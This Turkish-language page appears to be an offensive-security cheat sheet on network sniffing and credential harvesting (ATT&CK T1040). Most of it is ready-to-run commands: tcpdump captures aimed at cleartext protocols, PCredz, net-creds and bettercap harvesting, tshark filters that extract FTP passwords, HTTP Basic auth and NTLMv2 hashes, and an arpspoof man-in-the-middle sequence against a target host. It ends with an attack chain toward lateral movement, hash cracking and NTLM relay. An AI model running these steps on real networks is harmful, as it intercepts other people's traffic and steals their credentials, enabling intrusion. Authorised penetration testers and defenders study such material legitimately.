Trafik Dinleme & Kimlik Toplama
ATT&CK T1040 difficulty: kolay
Ağ trafiğini dinlemek; açık (şifresiz) protokollerden kimlik bilgisi toplamanın ve ortamı anlamanın hızlı bir yoludur (T1040). Switch’li ağda pasif dinleme yalnızca kendi/broadcast trafiğini görür; başkalarının unicast’ine erişmek için port mirroring, TAP veya MITM gerekir.
Ön koşullar
Section titled “Ön koşullar”- Promiscuous mode destekli arayüz (sudo)- Hedef segmentte konum veya ARP spoof izni- Araçlar: tcpdump, tshark, Wireshark, net-creds, PCredz, bettercapYakalama
Section titled “Yakalama”sudo tcpdump -i eth0 -w capture.pcapsudo tcpdump -i eth0 -G 3600 -W 5 -w hour.pcapsudo tcpdump -i eth0 -w clear.pcap \ 'port 21 or port 23 or port 80 or port 110 or port 143 or port 161'sudo tcpdump -i eth0 -w host.pcap host 10.10.10.5sudo tcpdump -i eth0 -nn port 5355 or port 137 or port 5353sudo net-creds -i eth0sudo python3 PCredz -i eth0sudo python3 PCredz -f capture.pcapsudo bettercap -iface eth0> net.sniff onpktmonAçık protokollerden kimlik
Section titled “Açık protokollerden kimlik”FTP (21) USER/PASSTelnet (23) düz metin oturumHTTP Basic Authorization: Basic base64HTTP form POST password= (HTTPS değilse)POP3 (110) / IMAP (143) LOGINSMTP AUTH AUTH PLAIN / LOGINSNMP (161) community stringLDAP simple bind düz metin DN + passwordLLMNR/NBNS NTLM challenge/response (Responder ile aktif)Kerberos AS-REQ (pre-auth offline — nadiren pratik)sudo python3 PCredz -f capture.pcaptshark -r capture.pcap -Y 'ftp.request.command == "PASS"' -T fields -e ftp.request.argtshark -r capture.pcap -Y 'http.authorization' -T fields -e http.authorizationtshark -r capture.pcap -Y 'ntlmssp.auth.username' -T fields \ -e ntlmssp.auth.username -e ntlmssp.ntlmv2_responsePCAP analizi (Wireshark / tshark)
Section titled “PCAP analizi (Wireshark / tshark)”-
Protokole göre filtrele — http.authorization , ftp.request.command == “PASS” , telnet , ntlmssp , kerberos.CNameString , ldap.simpleBind .
-
Akışı takip et — Follow → TCP Stream / UDP Stream ile oturum içeriğini oku; dosya aktarımlarını Export Objects ile çıkar.
-
Kimlik ve hash çıkar — NetNTLM hash’leri parola saldırıları ile offline kır; cleartext’i hemen yanal harekette kullan.
-
Ortam istihbaratı — DNS sorguları, SMB tree connect yolları, User-Agent, iç hostname’ler, domain adı.
tshark -r capture.pcap -q -z credentialstshark -r capture.pcap -Y 'dns.qry.name' -T fields -e dns.qry.name | sort -utshark -r capture.pcap -Y 'smb2' -T fields -e ip.src -e smb2.filename | headwireshark capture.pcapMITM ile birleştirme
Section titled “MITM ile birleştirme”sudo sysctl -w net.ipv4.ip_forward=1sudo arpspoof -i eth0 -t 10.10.10.5 -r 10.10.10.1 &sudo tcpdump -i eth0 -w spoofed.pcap host 10.10.10.5Komut üreteci
Section titled “Komut üreteci”tcpdump · capture
embedded toolsudo tcpdump -i eth0 -w capture.pcap tcp port 21 or tcp port 23tcpdump · capture
Section titled “tcpdump · capture”Saldırı zinciri
Section titled “Saldırı zinciri”Misafir portu / hub / SPAN → tcpdump + PCredz → SNMP community + FTP pass → iç panel login / SSHARP spoof → HTTP Basic + NetNTLMv2 → hashcat 5600 / relay